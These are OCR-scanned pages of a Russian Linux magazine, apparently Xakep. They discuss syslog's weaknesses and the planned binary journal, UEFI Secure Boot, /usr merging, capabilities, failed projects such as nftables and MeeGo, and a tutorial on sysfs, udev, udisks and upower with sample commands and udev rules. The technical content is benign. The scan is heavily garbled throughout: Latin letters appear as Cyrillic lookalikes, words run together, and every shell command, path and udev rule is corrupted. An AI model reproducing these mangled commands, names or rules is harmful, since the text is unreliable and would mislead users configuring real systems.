не гарантирует доставку. 

• Излогов легко удалятьданные, чем часто 
пользуются при взломедлязаметания сле- 
дов. 

• Ограниченныесредства контроля доступа: 
пользовательили имеет доступ ко всемза- 
писям в логе, или не имеет их вообще. 

• Практически полностью отсутствует воз- 
можность сохранения метаданных записи. 

• Ротациялоговтоженесовершенна:она не 
учитываетоставшееся на разделе место и не 
умеет динамически менять интервалы, что 
позволяет проводить РоБ-атаки. 

• Компрессия поддерживаетсятолько после 
ротации. 

• Невозможность сохранения бинарныхдан- 
ныхтипа согебштір. 
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ІЖІХОШ 



ІЕѴ«11ІІ4ІНІВІН!!^ 

ПнікІ ВчАЛ ГІОНВ ТірЧРІЧіГІ Спрмв» 

[Ііѵеи5ег^1осаІЬо5І -} $ деіісар /Ьіп/ріпд 
/Ьіп/ріпд = сар пег гэы+ер 
[Ііѵеизег^ІосаІЬозі -]$ | 



Больше никакихБІІЮ 



• Отсутствие возможностижурналирования 
событий на этапе ранней загрузки или перед 
самым выключением ОС. 

боигпаі также имеет особенности: 

• Все данные хранятся в формате «ключ - 
значение». Ключи и значения могут быть 
произвольные, значениями могут быть даже 
бинарные данные. 

• Записи проиндексированы, что значитель- 
но увеличивает скорость поиска. 

• Компрессия будетиспользована и для лога, 
в который в данный момент и дет запись. 

• Для каждойзаписи будетсоздан еехэш, 
который образуется нетолько из самой 
записи, но и из хэша предыдущей. Таким 
образом можно будет по цепочке проверить 
целостность всего лога (например, на пред- 
метудалениязаписей). Подобный механизм 
уже давно успешно применяется в діЕ 

• Поддерживается АРІ зузіод (с некоторыми 
расширениями) — не придется переписы- 
вать приложения. 

• Возможность гибко ограничить количество 
записей в лог за одну секунду. Это ограни- 
чение может меняться по заранее заданным 
правилам в зависимости от количества 
свободного места на разделе. 

• Ротация будетосуществляться автомати- 
чески, без применения стороннихутилит. 
При поиске активный и архивные логи будут 
вы глядеть какединое целое. 

• Можетобъединить в себелоги всехпри- 
ложений, в том числе иітр/ѵѵітр, журналы 
загрузки и другие. 



Заманчиво, конечно. Если бы не одно «но» 
— данные будут храниться в бинарном виде, 
то есть никаких тебе ІаіІ, Іезз и дгер напрямую. 
Перевесят ли все плюсы этот минус — покажет 
время. 



НОВЫЕ ВРЕМЕНА, ■ 
НОВЫЕ СТАНДАРТЫ 



Есть еще пара интересных вещей, которые не 
представляют из себя чего-то принципиально 
нового, а просто изменяют годами устоявшие- 
ся моменты. 

• Каталоги /Ьіп,/зЬіп,/ІіЬ(/ІіЬ64) будут совме- 
щены с соответствующими каталогами в/изг. 
По крайней мере в Ребога (а этозначит, что 
впоследствии сбольшой долей вероятности 
и вбольшинствеРРМ-дистрибутивов). Для 
обеспечения обратной совместимости на 
старом местебудутсимлинки. Таким образом 
все неизменяемыечасти системы теперьбу- 
дут лежать в одном месте, что позволит проще 
смонтироватьихвгеаб-опіу, прощесоздавать 
виртуальные окружения и снапшоты файло- 
вой системы. В качествеуспешного примера 
подобной иерархии приводят Боіагіз 11. 



• БІІЮ/БСЮ-биты будут постепенно за- 
менены на сараЬіІШез — механизм ядра, 

с помощью которого можно гибко управлять 
привилегиями. Многие уязвимости недавне- 
го прошлогобыли связаны с использовани- 
ем бинарников сБІІЮ-битом. 

• сЬгооІ, возможно, уступитместоболеесо- 
временному инструменту для запуска подо- 
зрительного кода и изолированной работы 
приложений — ІіЬѵИ-запбЬох. Основанный 
на ІіЬѵИ, при запуске он создает вирту- 
альную машину, в качестве корневой ФС 
которой используется кореньхост-системы, 
смонтированный в режиме геаб-опіу. Дебют 
инструмента должен произойти в Ребога 17. 

В общем-то, ничего удивительного, что 
большинство перечисленных радикальных 
перемен происходит в Ребога — ее разработ- 
чики любят ломать устои: взять хотя бы недав- 
нее переименование сетевух в зависимости 
от их расположения на материнской плате. 

В СапопісаІ же больше любят эксперименты 
с интерфейсами. Очередная инновация — 
ІІЬітІи НІЮ (РІеаб-ІІр Оізріау): система меню, 



НАВИСШАЯ УГРОЗА 



ІІЕРІ (ІІпіЯеб ЕхІепзіЫе Рігтѵѵаге Іпіег^асе) — грядущая замена уже 
порядком устаревшему ВІ05, которая представляет из себя скорее 
мини-ОС со своими драйверами, сетевым стеком, интерфейсом 
с поддержкой мыши, локализации и многим другим. Плюсов от 
внедрения ІІЕРІ много, начиная с (как ни странно) возросшей скорости 
загрузки и заканчивая нэйтивной поддержкой нового формата 
разбиения дисков ОРТ (не имеющего ограничений МВР). Но и минусов 
у ІІЕРІ тоже предостаточно. Основной на сегодняшний день - это баги. 
Размер дерева исходников ІбЕРІ занимает около 35 Мб (для сравнения, 
Ыпих без драйверов весит 30 Мб), спецификация в текстовом виде 
— больше 2 200 страниц. И весь этот огромный объем кода еще не 
достаточно тщательно оттестирован — баги всплывают достаточно 
часто. 

Новая неоднозначная фича ІІЕРІ, которая войдет в спецификацию 
версии 2.3.1, — зесиге ЬооЕ Если не вдаваться в подробности, то 
технологию можно описать следующим образом: весь код (точнее, 
его 5 НА-256 хэш), работающий с железом напрямую (драйвера, ядро, 
загрузчик) должен быть подписан одним из нескольких специальных 
ключей (Р5А, 2048 бит), открытая часть которых хранится в прошивке 
матплаты. Неподписанный (или подписанный нетем ключом) код 
исполняться не будет. Теоретически штука хорошая — эффективное 
средство против малвари, выполняющейся до загрузки ОС (например, 
живущей в МВР). Нос другой стороны, в зависимости от реализации 
может стать существенно сложнее или (что тоже не исключено) 
вовсе невозможно установить альтернативную ОС, отличную от 



предустановленной. Да и запустить самостоятельно собранное ядро 
уже не получится (привет пользователям Оепіоо), — точнее, получится, 
но ядро надо будет подписать собственным ключом, а его открытую 
часть как-то залить в хранилище ключей ІІЕРІ. Веб Наі, СапопісаІ 
и Ыпих РоипбаНоп отреагировали на это нововведение составлением 
своих рекомендаций к конечной реализации, а Р5Р — петицией 
к производителям оборудования, в которой 5есиге Ьоо* называется 
гез*гіс*еб Ьоо* (в случае некорректной реализации). 

Кроме проблем, связанных с ключами, есть еще проблема 
с загрузчиком, — самый популярный на сегодняшний день 6гиЬ2 
распространяется по 6РІ_ѵЗ, в которой есть пункт против тивоизации, 
требующий публиковать ключ в случае подписывания бинарника. 
Предыдущая версия — 6гиЬ І_едасу — в основном распространяется под 
6РІ_ѵ2, но некоторые вспомогательные скрипты — под 6РІ_ѵЗ. 

Матплаты с ІІЕРІ и поддержкой зесиге Ьоо* могут появиться в продаже 
уже в этом году — возможно, скоро придется учитывать этот аспект 
при выборе железа. Проблема становится еще более реальной, так 
как в соответствии с требованиями МісгозоН для того, чтобы наклеить 
на системник/ноут заветную наклейку «СотраНЫе ѵѵіНі ѴѴіпбоѵѵ5 8», 
производитель будет обязан включить опцию «Бесите Воо*». К тому же 
рекомендуется предусмотреть механизм для добавления собственных 
ключей. А для систем на базе АРМ — еще и обязательно отсутствие 
кнопки отключения эесиге ЬооЕ Но это не повод для паники: многие 
производители (в числе первых — НР и йеІІ) сообщили, что обеспечат 
во всех своих новых продуктах возможность отключить 5есиге ЬооЕ 
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Новые времена требуют перемен 



в которой чтобы выбрать определенный пункт, 
нужно написать его название в специальном 
поле. Если результатов поиска несколько, 
то выбранный вариант запоминается — так 
система подстраивается под конкретного 
пользователя. В дальнейшем планируется 
интеграция голосового поиска. Не стоит пере- 
живать, что классические меню уберут, НІЮ 
пока не замена им, а всего лишь приятное 
дополнение. Описать такую штуку непро- 
сто, нужно попробовать самому. Благо, это не 
сложно, — НІЮ должен быть интегрирован уже 
в ІІЬипІи 12.04. 



НОВОСТИ ОДНОЙ СТРОКОЙ 



Кроме крупных изменений, которые долго 
обкатываются, и о которых можно рассказать 
много интересного, в ближайшее время нас 
ждут и достаточно ощутимые изменения в раз- 
личных узких областях. Про нх также хотелось 
бы упомянуть. 

• ІРѵб. Давно не диковинка. Болеетого, благо- 
даря заканчивающемуся пулу ІРѵ4 и регу- 
лярно проводимомуѴѴогІсІ ІРѵб Бау, ІРѵб уже 
достаточно широко используется. Новость 
заключается в реализации ІРѵб І\ІАТ. Раз- 
личные патчи, реализующиеэту функцио- 
нальность, конечно, существуютдостаточно 
давно, но скоро мы увидим это в пеШІІегиз 
коробки. 

• РІ0Р5 (Раігіприі/Оиіриі: Орегаііопз Рег 
5есопб) — новый планировщик ввода/выво- 
да, предназначенный для работы с55Б. По 
принципудействия он похожна популярный 
сейчас СРО (и заимствует у него часть кода), 
но учитывает та кие свойства 550, как вы- 
сокие скорости чтения изаписи, небольшие 
задержки, различную «стоимость» чтения 

и записи, зависимость скорости выполнения 
запроса от его размера. Наибольший отрыв 
отСРО новый планировщик показывает 
в тестах со смешанным геасі/ѵѵгііе профилем. 
Кодеще не протестирован, поэтому, думаю, 
раньше, чем в ЫпихЗ.5 мы его вряд л и уви- 
дим. 

• ехи-зпарзбоіз — реализация снапшотов 
для ех*4 (по аналогии с теми, что есть в Ыгіъ). 
У снапшотов на уровне ФС довольно много 
плюсов передснапшотами на базе БУМ: нет 
необходимости заранее резервировать 
место под снапшот, даже при большом 
количестве снапшотов производительность 
несильно падает. Правда, не факт, что эти 
патчи попадут в ванильное ядро — патчи 

со снапшотам и для ехіЗ (ІМЕХТЗ) оттойже 
команды покатудатаки не вошли. 

• В Сітр 2.8, релиз которого должен состоять- 
ся в первой половинеэтого года, наконец-то 
появится долгожданный однооконный 
интерфейс. 

• В скором времени большое количество 
0реп5оигсе-шутеров сможетперейти на ис- 
пользование движка ісі ТесЬ 4, на базе кото- 
рого построен БооітіЗ. Движок был недавно 
открыт компанией 2епітах (спасибо Джону 
Кармаку за замечательную традицию) под 
6РІ_ѵЗ (с небольшими поправками). 



НЕ ВЗЛЕТЕЛИ 



Новые технологии приходят на смену старым 
постоянно, но не все из них успешны и находят 
свое место под солнцем. Из примеров по- 
следнего времени мне особенно запомнились 
несколько. 

ІѴЮаЫез — замена ірІаЫез/пеНчІІег. Плюсы: 
более гибкий и расширяемый АВІ, отсут- 
ствие дублирования кода (ірІаЫез, агрІаЫез 
и еЫаЫез — по сути, копии одного и того 
же кода), нет необходимости перезагрузки 
всех правил при каждом изменении (из-за 
чего терялось внутреннее состояние и все 
установленные соединения). Концепция вы- 
глядела многообещающе (подробнее можно 
посмотреть в ][ #127), но, видимо, этого было 
недостаточно, чтобы перевесить популяр- 
ность ірІаЫез. В Ребога, кстати, для борьбы со 
сбросом соединений при изменении правил 
сделали специальную прослойку -ЛгеѵѵаІЮ, 

— которая сохраняет свое состояние. В Ребога 
17 этот динамический файрвол, скорее всего, 
будет использоваться по умолчанию. 

Второй пример подобного неудачного 
проекта — дистрибутив Ыпих для мобильных 
и встраиваемых устройств от Ыпих Роипбаііоп. 
РІачиналась эта ОС с двух проектов: Маето 
от ІМокіа (с ней поставлялись прародители 
современных планшетов ІМокіа 770, N800, 



N810 и N900 начиная с 2005 года) и МоЫіп 
от I піеі (разрабатывался с 2007 года). В 2010 
году N 0 ^ и Іпіеі объединили свои усилия для 
работы над новым дистрибутивом — Меедо, 
который должен был взять все лучшее от 
Маето и МоЫіп. Проект обещал быть пер- 
спективным, заинтересованность выразили 
около тридцати крупных компаний мирового 
уровня, управление проектом перешло в руки 
Ыпих Роипбаііоп. После выпуска смартфона 
N9 N 0 ^ потеряла интерес к Меедо, сосредо- 
точившись на ѴѴіпбоѵѵз РЬопе. Чтобы дальше 
развивать проект, в конце прошлого года Ыпих 
Роипбаііоп объединила свои наработки с І_іМо 
(Ыпих МоЬіІе) Роипбаііоп под новым именем 
Тігеп и основной концепцией приложений на 
НТМБ5. Разработчики Меедо, в свою очередь, 
организовали форк — Мег. Не исключена 
возможность слияния Тігеп и 5атзипд Ваба. 
Возможно, нас опять ждет новое имя для ОС, 
у которой уже было больше названий, чем 
работающих под ее управлением устройств на 
рынке. 



НАДЕЕМСЯ И ВЕРИМ 



Во всех этих нововведениях я вижу только по- 
ложительные моменты. Надеюсь, они пройдут 
испытание временем и не останутся на свалке 
истории. И-И 




Архитектура ѴѴауІапсІ в сравнении с архитектурой X Бегѵег 




гтш 

• Тивоизация 
— процедура, 
реализующая 
невозможность 
запуска на 
устройстве 
модифицированной 
версии прошивки. 
Понятие пошло от 
медиаплеера ТіѴо. 

• иітр/ѵѵітр/ 

Ытр — файлы 

в бинарном формате, 
в которых хранится 
информация 
о текущих 
пользователях 
в системе, лог 
всех входов/ 
выходов из системы 
и неудачных 
попыток 
авторизации. 

• Подробно 
озузіетсі можно 
прочитать в ][ 148. 



• Достаточно 
подробный РАО по 
ѵѵауІапсі: 



• Планы по 
разработке Х12: 



Демонстрация работы ѴѴауІапсі. Пока в Х.Огд 
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ІЖІХОІО 



Евгений Зобнин (іоЬпіпйдтаіІ.сот) 





РАЗБИРАЕМСЯ 
С К0ЕМЕСТ5, 5Ѵ5Р5, 
ІІОЕѴ, ІЮІ5К5 

и цроѵУЕК 

Одним из главных новшеств ядра Ыпих 
версии 2.6 стала поддержка виртуальной 
файловой системы зузі'з, экспортирующей 
информацию об установленном оборудовании 
и позволяющей управлять его настройкой. 
Сегодня возможности зузСз широко 
используются во всех дистрибутивах для 
определения железа, автоматической 
загрузки модулей и монтирования файловых 
систем. Но что представляет собой данная 
ФС, и какие плюсы она может дать обычным 
юзерам, знает далеко не каждый. 




Строго говоря, зуэ^з — это только один из кирпичиков системы 
умного управления оборудованием, появившейся в Ыпих в по- 
следние годы. Сама по себе эта файловая система практически 
бесполезна и может дать желаемый результат только в сочетании 
с другими системами, построенными на ее основе, такими как исіеѵ 
(динамически создающей файлы устройств в каталоге /беѵ), исіізкз 
(автоматически монтирующей файловые системы вновь подклю- 
ченных накопителей) и ироѵѵег (системы управления питанием, 
реагирующей на сообщения подсистемы АСРІ и подстраивающей 
параметры системы, используя зузіъ). Но начнем с корневого 
элемента. 



КОВ^СТЗ И 5У5Р5 



Одной из целей разработки ядра 2.5, которое после стабилизации 
превратилось в 2.6, была переработка и унификация модели драйве- 
ров, которая ктому времени стала слишком громоздкой, запутанной 
и сложной для понимания. С этой целью была придумана абстрак- 
ция, названная КОЬіесІ — простая структура данных, позволяющая 
однозначно идентифицировать и связывать между собой различные 
устройства, которые «видит» операционная система. Фактически, 
теперь каждое устройство, начиная от системного таймера и закан- 
чивая 5С5І-приводом, было привязано к собственному уникальному 
К-объекту, который не только позволял точно идентифицировать 
его, но и связать с другими К-объектами по принципу «родитель- 
потомок». Например, изЬ-порт является «родителем» воткнуто- 
го в него изЬ-устройства. Также были придуманы специальные 
объединения К-объектов (кзеі) для представления различных под- 
систем, но в контексте данной статьи это роли не играет. 
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Часть файла тосіиіез.аііаз 



В определенный момент для отладки всего этого хозяйства 
была реализована виртуальная файловая система сШз (йеѵісе 
Огіѵегз РіІеЗузІет), которая позволяла представить все отношения 
К-объектов в виде дерева каталогов и файлов. Позднее файловую 
систему переименовали в зузіъ, и она стала неотъемлемой частью 
модели драйверов Ыпих. Что же дает зуз^з операционной системе? 

Так как зузіъ является визуальным представлением связи всех 
К-объектов ядра, а К-объекты — представлением оборудования, 
установленного в компе, то мы получаем своего рода вход в святая 
святых операционной системы. Например, мы можем проследить, 
как устройства объединены с помощью шин, на каком 5АТА-порту 
виситжесткий диск, определить его производителя, модель, 
характеристики и даже изменить параметры работы. Собственно, 
почти все, что ядро знает про устройство и может с ним проделать, 
можно узнать (и выполнить) с помощью чтения и записи файлов. 

Приведу пример. Выполни следующую команду: 

$ саі /зѵз/сіазз/пеіі/еііііѳ/асісігезз 

На экран будет выдан МАС-адрес сетевой карты еіЬО. Прочитав 
другие файлы каталога /зуз/сІазз/пеі/еіЬО, ты сможешь выяснить 
такую информацию, как скорость интерфейса, поддержку режима 
дуплекса и многое другое. 

Команда с а* /зуз/ЬІоск/зсІа/зііе выведет на экран размер 
диска зсіа, представленный в 512-байтных блоках. 

А команда 

# есііо рег-Рогтапсе > /зѵз/сІеѵісез/зѵзІгет/сри/сриѲ/сри- 

-Ргед/зсаііп^ ^оѵегпог 

переведет первое ядро процессора (или все сразу, если про- 
цессор не поддерживает раздельное управление) в режим макси- 
мальной производительности. Кроме демонстрации возможностей 
зузіъ, эти примеры показывают еще одну особенность файловой 
системы. Обрати внимание, что в качестве первого элемента 
пути используются разные по сути имена каталогов: сіазз, Ыоск, 
беѵісез. Но это не бардак в головах разработчиков, а фича фай- 
ловой системы. Дело в том, что добраться до любого устройства 
с помощью зузіъ можно несколькими путями: 

/зуБ/сІеѵісе/ - дерево устройств так, как его видит ядро; 
/зуз/Ыоск/ - блочные устройства; 

/зуз/Ьиз/ - перечень шин, зарегистрированных в ядре; 



/зуз/сіазз/ - группировка устройств по классам. 

В /зуз/беѵісе можно найти любое устройство, известное ядру, 
однако для удобства предусмотрены еще три мета-каталога, ко- 
торые группируютустройства различными способами. Обращаясь 
к файлам внутри них, ты так или иначе попадешь в нужное дерево / 
зуз/беѵісез по символической ссылке. Также зузіъ предлагает не- 
сколько специальных каталогов для сервисных нужд: 

/зуз/йгтмаге/ - закрытые файлы бгішаге, нужные для работы 
некоторых устройств; 

/зуз/Тз/ - управление файловыми системами, основанными на 
РІІ5Е (например ех±4 и ФС); 

/Буз/кегпеі/ - интерфейс низкоуровневого управления ядром 
(профилирование, дебаг и так далее); 

/зуз/тосіиіе/ - все модули, загруженные ядром, - по 

каталогу на каждый (обычно есть подкаталог рагатеііегз, 

позволяющий управлять опциями модуля); 

/зуз/ромег/ - контроль параметров энергопотребления. 

С наскоку разобраться в дереве каталогов зузіъ проблематично. 
Но делать этого и не требуется, — файловая система никогда не 
была предназначена для ковыряния руками, поэтому мы перехо- 
дим к обсуждению инструментов, которые наиболее полно исполь- 
зуют ее возможности. 



ІШЕѴ 



Зачем же нужна зузіъ, если ее нельзя потрогать, что называется, 
голыми руками? Все дело в приложениях пространства пользова- 
теля. В Ыпих никогда не существовало единого механизма управ- 
ления оборудованием, который могли бы использовать приложе- 
ния, работающие вне ядра. Какую-то информацию можно было 
получить с помощью ргосіъ, другую — с помощью іосіі-вызовов 
к файлам устройств, третью — напрямую из памяти ядра (так де- 
лает бтібесобе). Но единого интерфейса, который бы выдавал всю 
подноготную компа, не было. И зузіъ стала просто спасением для 
разработчиков софта и дистрибутивов: они получили инструмент, 
с помощью которого можно производить автоконфигурирование 
ОС, адекватно реагировать на горячее подключение устройств 
и события ріид апсі ріау. 

Первой разработкой, которая начала использовать зузіъ на всю 
катушку, стал демон ибеѵ, предназначенный для автоматическо- 
го создания файлов устройств в каталоге /беѵ при подключении 
к компу нового устройства. ІІсІеѵ подключается к ядру с помощью 
пеіііпк-сокета, по которому получает извещения (так называемые 
иеѵепі) о происходящих в системе событиях, таких как подключе- 
ние ІІЗВ-принтера или отключение мышки. Вместе с информацией 
о событии, а также данными о самом устройстве, демон получает 
путь к каталогу внутри зузіъ, представляющему подключенное 
устройство. На основе данных, полученных из зузіъ, и написанных 
заранее правил демон создает файл устройства внутри /беѵ, давая 
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Команда «исіеѵасіт топііог» позволяет просмотреть события исіеѵ в режиме реального 
времени 

ему нужные права и назначая тіпог/тащг-номера. 

Кроме различных низкоуровневых файлов, описывающих 
устройство (например, ѵепсіог — производитель, тосіеі — модель 
устройства), в зузі'з есть и еще один очень важный файл тосіаііаз, 
содержащий строку вида "рсі:ѵ00001 0ЕСсЮ0008139бѵ00001 734зсІ 
00001 0В8Ьс02зс00і00". Это уникальный идентификатор устрой- 
ства, который используется исіеѵ для загрузки нужного модуля 
устройства. Он генерируется во время сборки ядра на основе кода 
драйверов, каждый из которых содержит список идентификаторов 
поддерживаемых устройств. Этот список сохраняется в файл /ІіЬ/ 
тосІиІез/ВЕРСИЯ-ЯДРА/тосІиІез.аІіаз, описывающий псевдоимена 
модулей для команды тосІргоЬе. Все что остается сделать исіеѵ 
для загрузки нужного драйвера, это выполнить команду тосІргоЬе 
с аргументом в виде содержимого файла тосіаііаз устройства. Ты 
можешь попробовать сделать это сам: 

# тосІргоЬе рсі :ѵ000010ЕСсІ . . . 

Одно из самых важных качеств исіеѵ, отличающих его от 
прошлой реализации сіеѵ^з, работающей внутри ядра, состоит 
в том, что он позволяет пользователю контролировать процесс 
создания файлов в каталоге /беѵ, а также запускать различные 
приложения на основе тех или иных параметров устройства, 
полученных от зузі'з. Такая особенность позволяет делать очень 
интересные вещи, — например, назначать своей личной флешке 
уникальное имя внутри /беѵ или запускать приложение син- 
хронизации файлов, если в систему была воткнута цифровая 
камера. Все это делается с помощью ибеѵ-правил. Системные 
правила хранятся в каталоге /ІіЬ/ и сіеѵ/ги Іез.сІ, а для пользовате- 
лей и администраторов предусмотрен каталог /еіс/и сі еѵ/ги I ез. 6. 
Позже мы рассмотрим несколько примеров использования этого 
каталога. 

Чтобы информировать другие службы об изменении кон- 
фигурации устройств и подключении новых, исіеѵ использует 
шину сІ-Ьиз. Любое приложение, имеющее соответствующие 
права, предоставленные тулкитом РоІісуКіІ, может подклю- 
читься к шине с целью получения уведомлений и выполнения 
ответных действий. Так делает любая среда рабочего стола, 
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Результат выполнения команды «исіізкг --зИоѵѵ-іп^о /сіеѵ/зсіа» 



и именно поэтому ты можешь не заботиться о самостоятельном 
запуске нужных приложений. При подключении веб-камеры на 
экране сразу появляется окно менеджера фотографий, а при 
подключении принтера происходит его автоконфигурирование. 
Каждая среда использует свой набор приложений и сервисов 
для взаимодействия с исіеѵ, но есть два инструмента, которые 
используют все, — это исіізкз и ироѵѵег. 



ІЮІ5К5 И ІІРОѴѴЕР 



Демоны исіізкз и ироѵѵег представляют собой менеджеры дисков 
и питания соответственно. Изначально они были частью проекта 
йеѵісеКіІ, но когда многие компоненты последнего были перене- 
сены в исіеѵ, стали отдельными проектами. Оба демона исполь- 
зуют исіеѵ, зуз^5 и сІ-Ьиз для получения информации о железе, 
нотификаций о подключении дисков или изменении режима 
питания и отправки этой информации вовне. 

Поначалу может показаться странным, что при наличии зузі'з, 
знающем о железе все, и исіеѵ, информирующем о «железных 
событиях» весь остальной мир, нужны еще какие-то внешние 
инструменты. На самом же деле существование исіізкз и ироѵѵег 
действительно важно, так как это не просто очередные ноти- 
фикаторы, а полноценные менеджеры. ІІсІізкз, например, кроме 
извещения системы о подключении новых дисков (что и так без 
него делает исіеѵ) имеет встроенный интерфейс управления: 
по запросу другого приложения он может выдать подробную 
информацию о накопителе, его разметке, смонтировать/раз- 
монтировать разделы, выполнить низкоуровневые операции над 
устройством, остановить шпиндель и так далее. Чтобы проде- 
лать эти действия самостоятельно, приложению пришлось бы 
иметь права гооі на запись файлов в зузі'з и монтирование, здесь 
же оно может просто подключиться к сІ-Ьиз, запросить права 
у РоІісуКіІ и слать запросы. Немаловажно также, что исіізкз уме- 
ет выполнять поллинг устройств (например, для обнаружения 
компакт-диска в приводе), на что не способен исіеѵ. 

Демон исіізкз снабжен утилитой пространства пользователя, 
с помощью которой можно выполнить многие действия над на- 
копителями. Например, чтобы просмотреть подробную инфор- 
мацию обо всех дисках системы, можно выполнить следующую 
команду: 

$ исіізкз --сіитр 

Для получения информации о конкретном накопителе, включая 
модель, характеристики и информацию 5МАРТ: 

$ исіізкз --зііоы-іп-ро^/сіеѵ/зсіа 

Для извлечения диска: 

$ исііз кз --езесі /сіеѵ/ссігот 
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Звенья одной цепи 




Архитектура исіеѵ как она есть 



Для установки таймаута на остановку диска: 

$ ибізкз --з еіі-зріпбоіл/ п /беѵ/зба - -зріп боі л/п-іііт ео иі: СЕКУНДЫ 

И, кстати говоря, все эти действия не потребуют прав гооі. Со- 
временные йЕ уже перешли на использование ибізкз в качестве 
менеджера накопителей и используют его даже в утилитах раз- 
метки дисков. Также есть несколько проектов создания легковес- 
ных демонов а вто монтирован ия, например беѵтоп. Просто уста- 
нови ибізкз и беѵтоп, а затем добавь в конец файла -/.хзеззіоп 
строку (заменив ИихЬох на свой менеджер окон): 

ехес ск-іаипсб-зеззіоп Ьазіі -с "беѵтоп & ПихЬох" 

Так диски будут монтироваться автоматически. 

Демон ироѵѵег предоставляет аналогичную функциональ- 



ность, связанную с управлением питанием. Он занимается тем, 
что следит за состоянием питания устройств, может управлять 
режимами энергосбережения различных компонентов ПК и из- 
вещать систему о таких событиях, как переход на использование 
аккумулятора и сильный нагрев винчестера или видеокарты. 
Пока он находится в начальной стадии разработки, поэтому 
лишь немногие дистрибутивы задействуют его возможности, 
предпочитая использовать ибеѵ, зузі'з и АСРІ. 

Как и ибізкз, ироѵѵег имеет утилиту управления, однако един- 
ственное, что можно получить от нее на данном этапе развития, 
это сводку о состоянии питания различных компонентов машины. 
Сделать это можно с помощью команды «ироѵѵег --битр». 



ТРЮКИ 



Вернемся к зуз^5 и ибізкз и посмотрим, какие интересные вещи 
можно сделать с их помощью. Начнем с зузі'з: 
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ІЖІХОГО 



1. Получение статистики использования сетевых интерфейсов: 

$ §гер -г . /5Ѵ5/с1а55/пе1:/е1:ІіѲ/5І:а1:І5І:іс5 

2. Информирование системы о том, что диск не является механи- 
ческим (позволяет сделать ввод-вывод при использовании 55й 
чуточку быстрее): 

# есііо 0 > /5Ѵ5/Ыоск/5сІЬ/диеие/го1=а1=іопа1 

3. Принудительный рескан 5С5І -устройств (на при мер для добавле- 
ния на лету новых разделов в виртуальной машине): 

# есНо > /зѵз/сіазз/зсзі Ііоз-Е/Ііоз-ЕѲ/зсап 

4. Получение информации о питании каждого 115В -порта: 

$ -Рог і іп 'бпсі /зуз/сІеѵісе5/*/*/и5Ь* \ 

-пате Іеѵеіі; сіо есііо -п "$і^ " ; саі: $і; сіопе 

5. Информация о компе (производитель, материнская плата итак 
далее): 

# саі: Ѵзуз/сіеѵісез/ѵіг-риаі/сіті/ісі/* 

6. Температура процессора: 

# саі: /5ѵз/с1а55/Ііытоп/1імтоп0/1:етр1_іпри1: 

7. Управление яркостью экрана (максимальная яркость прописана 
в /зуз/сІазз/ЬаскІ ідЫ:/асрі_ѵісІеоО/тах_ЬгідЫ:пезз): 

# есііо 8 > /5У5/с1а55/Ьаск1і^Іі1:/асрі_ѵісІео0/Ьпі^Іі1:пе55 

8. Перевод системы в спящий режим (вместо тет можно использо- 
ватьсіізкдля гибернации): 

# есііо тет > /зуз/ромег/з1:а1:е 

Это только малая часть того, что можно сделать, используя 
зузі'з. В любом случае, лучше самостоятельно покопаться в недрах 
файловой системы с помощью файлового менеджера. 

Теперь поговорим об исіеѵ. Демон исіеѵ имеет систему пра- 
вил, которые описываютто, как он именует создаваемые файлы 
устройств, какие права им назначает и что делает после созда- 
ния. Правила имеют простой формат и помещаются в файлы вну- 
три каталогов /ІіЬ/исІеѵ/гиІез . 6 (системный) или /еіс/и сіеѵ/ги Іез.сІ. 
По соглашению все файлы правил имеют префикс в виде цифры, 
который определяет порядок их загрузки. Мы назовем свой файл 
/ек/исІеѵ/гиІе5.сІ/99-си5Іот.гиІе5. Что в него можно поместить? 

1. Автомонтирование: 

АСТІОІМ=="асІсГ . КЕКNЕ^== ,, 5СІ<а-2><0-9> ,, . 

ЕІМѴ{ІР 115В РКІѴЕКІ^'изЬ-Б^огаЕге". 

КШ+^/Ьіп/тксІіг -р^/тп^Ак" 

АСТІОІ\І=="асІсІ V КЕК ІМЕ І.=="5СІ</а-2><а-2><0-9>". 
ЕМѴ{ІР_и5В_РКІѴЕК}="и5Ь-5І:ога§е ,, : , 

КІІМ+="/Ьіп/тоип1: -о гы.поехес ,с!та5к=000 < Тта5к=111 < и1:Т8 
/ёеѵ/% к /тггЬ/Хк" 

АСТІОІМ=="гетоѵе" . КЕК1МЕ1_=="5ск/а-2><а-2><0-9>" . 
Е^ІР^БВ^КІѴЕКК'изЬ-з-Ьогазе", 

РШІ\І+^УЬіп/итоип1: /тп1:/%к ,, 

Эта самый простой вариант автомонтирования, который работа- 
еттолько в отношении ІІ5В-флешек. Правила проверяют устрой- 
ство на принадлежность к классу 115В Мазз 5іогаде и монтируют 



гсш 

Если ты хочешь 
самостоятельно 
разобраться во 
внутренностях зувів, 
советую начать 
с каталога /буб/сіэбб, 
который сортирует 
устройства в более 
удобном для 
понимания виде. 

В каждом каталоге 
устройства 5уз*5 
есть файл иеѵепі, 
содержащий имя 
устройства и его 
таіог/тіпог-номера. 
Он используется 
исіеѵ для создания 
файлов устройств во 
время загрузки. 



разделы флешки в каталог/тпі. При выдергивании происходит 
размонтирование. 

2. Синхронизация файлов: 

АСТІОІЧ^асИ ѴКЕ^ЕІ=^5СІ</а-2><а-2><0-9> ,, : , 

ЕМѴ{І0_У5В_0КІѴЕК}= ,, изЬ-з1:ога§е ,, д 

КШ\1+="/Ып/ср -а /тп1:/%к /Ьаскир/%к" 

Это правило позволяет синхронизировать содержимое флешки 
с каталогом файловой системы (в данном случае /Ьаскир/имя_ 
устройства) с помощью обычного ср. Его следует поместить перед 
последней строкой предыдущего набора правил. 

3. Назначение статичных имен сетевым картам: 

51)В5У5ТЕМ=="пе1:" . АТТК{асІсІге55>=="аа : ЬЬ : сс : сИ : ее : -р-р" . 
ІМАМЕ="1апѲ" 

5ЦВ5У5ТЕМ=="пе1:" . АТТК{асІсІге55}== ,, -Р1 : : ее : сісі : сс : ЬЬ : аа" . 
МАМЕ="ы1ап0" 



Правила проверяют МАС-адрес устройства и на его основе на- 
значают имя. Строка АТТРІасІсІгезз} позволяет получить содержи- 
мое файла асісігезз внутри каталога устройства в зузі'з. 

4. Автоматическоеотключениетачпада при подключении мыши: 

АСТІОІМ=="асІсГ . 5^В5У5ТЕМ=="іпри1: ,, . КЕКІМЕІ.=="тои5е[1-9] " . 
ЕІМѴ{РІ5РІ.АУ}=" : Ѳ.Ѳ" . 

ЕЫѴ{ХАІІТНОКІТУ}="/Ііоте/ІІ5ЕКМАМЕ/ .Хаи'ЬІіопіѣу"^ 
ЕІМѴ{ІР_СІА55}= ,, тоизе" л КШ+=Ѵизг/Ьіп/5упс1іеп1: ТоисІірасІО-Р^І" 
